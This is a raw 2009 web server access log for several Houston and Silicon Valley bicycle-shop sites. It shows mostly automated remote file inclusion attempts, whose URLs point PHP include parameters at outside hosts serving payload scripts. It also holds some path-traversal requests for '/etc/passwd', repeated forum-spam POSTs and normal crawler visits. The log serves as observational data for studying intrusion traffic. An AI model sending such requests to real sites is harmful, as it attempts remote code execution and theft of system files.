201.232.54.48 - - [10/Jun/2009:19:57:28 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [10/Jun/2009:19:57:31 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [10/Jun/2009:19:57:38 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.232.54.48 - - [10/Jun/2009:19:57:41 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.225.92.50 - - [10/Jun/2009:20:00:39 -0700] "GET /translations///tools/send_reminders.php?noSet=0&includedir=../../../../../../../../etc/passwd HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "bicyclestoreshouston.com"
206.225.92.50 - - [10/Jun/2009:20:00:39 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "bicyclestoreshouston.com"
201.232.54.48 - - [10/Jun/2009:20:01:01 -0700] "GET /ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.232.54.48 - - [10/Jun/2009:20:01:01 -0700] "GET /translations/Finnish.txt//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.232.54.48 - - [10/Jun/2009:20:01:01 -0700] "GET /translations//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.225.92.50 - - [10/Jun/2009:20:01:18 -0700] "GET /translations///tools/send_reminders.php?noSet=0&includedir=../../../../../../../../etc/passwd HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "houstonbikeshop.com"
206.225.92.50 - - [10/Jun/2009:20:01:18 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "houstonbikeshop.com"
201.232.54.48 - - [10/Jun/2009:20:01:51 -0700] "GET /translations//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.232.54.48 - - [10/Jun/2009:20:01:51 -0700] "GET /ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.232.54.48 - - [10/Jun/2009:20:01:51 -0700] "GET /translations/Finnish.txt//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.232.54.48 - - [10/Jun/2009:20:02:46 -0700] "GET /translations//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
201.232.54.48 - - [10/Jun/2009:20:02:46 -0700] "GET /ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
201.232.54.48 - - [10/Jun/2009:20:02:46 -0700] "GET /translations/Portuguese_BR.txt//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
201.232.54.48 - - [10/Jun/2009:20:03:02 -0700] "GET /translations/Spanish.txt//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [10/Jun/2009:20:03:02 -0700] "GET /translations/Finnish.txt//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [10/Jun/2009:20:03:02 -0700] "GET /translations/Italian.txt//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.232.54.48 - - [10/Jun/2009:20:03:06 -0700] "GET /translations/Hungarian.txt//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.232.54.48 - - [10/Jun/2009:20:10:01 -0700] "GET /translations/Portuguese_BR.txt//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
201.232.54.48 - - [10/Jun/2009:20:10:04 -0700] "GET /ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
201.232.54.48 - - [10/Jun/2009:20:10:04 -0700] "GET /translations//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
201.232.54.48 - - [10/Jun/2009:20:10:51 -0700] "GET /translations/Spanish.txt//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [10/Jun/2009:20:10:51 -0700] "GET /translations/Finnish.txt//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [10/Jun/2009:20:10:51 -0700] "GET /translations/Hungarian.txt//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.232.54.48 - - [10/Jun/2009:20:10:51 -0700] "GET /translations/Italian.txt//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
204.62.53.203 - - [10/Jun/2009:20:19:38 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
96.8.181.103 - - [10/Jun/2009:20:54:59 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.svbikes.com"
96.8.181.103 - - [10/Jun/2009:20:55:00 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.svbikes.com"
96.8.181.103 - - [10/Jun/2009:20:56:40 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:21:20:20 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
72.30.142.240 - - [10/Jun/2009:21:31:46 -0700] "GET /logs/ HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
208.80.195.39 - - [10/Jun/2009:21:32:01 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; ESB{38731299-41CC-4842-8707-0ED56DBE4CD6})" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:21:33:48 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:21:40:54 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
211.49.99.7 - - [10/Jun/2009:22:11:27 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.49.99.7 - - [10/Jun/2009:22:11:27 -0700] "GET /translations/Czech.txt//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.49.99.7 - - [10/Jun/2009:22:11:29 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.49.99.7 - - [10/Jun/2009:22:11:29 -0700] "GET /translations/Czech.txt//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.49.99.7 - - [10/Jun/2009:22:11:29 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.49.99.7 - - [10/Jun/2009:22:11:31 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.49.99.7 - - [10/Jun/2009:22:11:40 -0700] "GET /translations/Czech.txt//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.49.99.7 - - [10/Jun/2009:22:11:40 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.49.99.7 - - [10/Jun/2009:22:11:43 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.49.99.7 - - [10/Jun/2009:22:11:48 -0700] "GET /translations/Czech.txt//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.49.99.7 - - [10/Jun/2009:22:11:48 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.49.99.7 - - [10/Jun/2009:22:11:52 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.49.99.7 - - [10/Jun/2009:22:12:18 -0700] "GET /translations/Turkish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
211.49.99.7 - - [10/Jun/2009:22:12:18 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
211.49.99.7 - - [10/Jun/2009:22:12:18 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
211.49.99.7 - - [10/Jun/2009:22:12:28 -0700] "GET /translations/Turkish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
211.49.99.7 - - [10/Jun/2009:22:12:28 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
211.49.99.7 - - [10/Jun/2009:22:12:28 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
211.49.99.7 - - [10/Jun/2009:22:12:40 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
211.49.99.7 - - [10/Jun/2009:22:12:40 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
211.49.99.7 - - [10/Jun/2009:22:12:40 -0700] "GET /translations/Turkish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
211.49.99.7 - - [10/Jun/2009:22:13:09 -0700] "GET /translations/Turkish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
211.49.99.7 - - [10/Jun/2009:22:13:09 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
211.49.99.7 - - [10/Jun/2009:22:13:09 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
211.49.99.7 - - [10/Jun/2009:22:13:45 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
211.49.99.7 - - [10/Jun/2009:22:13:48 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
211.49.99.7 - - [10/Jun/2009:22:14:04 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
211.49.99.7 - - [10/Jun/2009:22:14:29 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
81.19.66.38 - - [10/Jun/2009:22:31:05 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:22:31:06 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:22:31:07 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:22:31:08 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:22:31:08 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
218.106.254.18 - - [10/Jun/2009:22:35:51 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
218.106.254.18 - - [10/Jun/2009:22:35:51 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
218.106.254.18 - - [10/Jun/2009:22:37:34 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
218.106.254.18 - - [10/Jun/2009:22:44:17 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.106.254.18 - - [10/Jun/2009:22:44:17 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.106.254.18 - - [10/Jun/2009:22:44:43 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.106.254.18 - - [10/Jun/2009:22:44:43 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.surrealgaminglabs.com/bistro/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.189.18.73 - - [10/Jun/2009:22:50:07 -0700] "GET /translations/Russian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [10/Jun/2009:22:50:07 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [10/Jun/2009:22:50:07 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [10/Jun/2009:22:50:08 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [10/Jun/2009:22:50:08 -0700] "GET /translations/Russian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [10/Jun/2009:22:50:08 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [10/Jun/2009:22:50:08 -0700] "GET /translations/Russian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [10/Jun/2009:22:50:08 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [10/Jun/2009:22:50:08 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.106.146 - - [10/Jun/2009:23:05:07 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:23:05:28 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:23:06:03 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:23:25:53 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:23:28:14 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:23:32:00 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:23:32:14 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
211.189.18.73 - - [10/Jun/2009:23:33:40 -0700] "GET /translations/French.txt//ws/get_events.php?includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [10/Jun/2009:23:33:40 -0700] "GET /ws/get_events.php?includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [10/Jun/2009:23:33:40 -0700] "GET /translations//ws/get_events.php?includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [10/Jun/2009:23:33:42 -0700] "GET /ws/get_events.php?includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [10/Jun/2009:23:33:42 -0700] "GET /translations/French.txt//ws/get_events.php?includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [10/Jun/2009:23:33:42 -0700] "GET /translations//ws/get_events.php?includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [10/Jun/2009:23:33:43 -0700] "GET /ws/get_events.php?includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [10/Jun/2009:23:33:43 -0700] "GET /translations/French.txt//ws/get_events.php?includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [10/Jun/2009:23:33:43 -0700] "GET /translations//ws/get_events.php?includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:23:34:45 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
87.118.90.151 - - [10/Jun/2009:23:37:37 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://a222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
58.61.164.40 - - [10/Jun/2009:23:38:12 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:23:45:20 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:23:51:47 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
94.142.129.98 - - [11/Jun/2009:00:03:36 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard//index.php" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)" "www.svbikes.com"
94.142.129.98 - - [11/Jun/2009:00:03:37 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)" "www.svbikes.com"
94.142.129.98 - - [11/Jun/2009:00:03:38 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)" "www.svbikes.com"
58.61.164.141 - - [11/Jun/2009:00:05:08 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
98.200.252.208 - - [11/Jun/2009:00:10:15 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.svbikes.com"
98.200.252.208 - - [11/Jun/2009:00:10:17 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.svbikes.com"
213.149.105.23 - - [11/Jun/2009:00:10:26 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
213.149.105.23 - - [11/Jun/2009:00:10:26 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
213.149.105.23 - - [11/Jun/2009:00:10:29 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
213.149.105.23 - - [11/Jun/2009:00:10:36 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
213.149.105.23 - - [11/Jun/2009:00:10:59 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
213.149.105.23 - - [11/Jun/2009:00:10:59 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
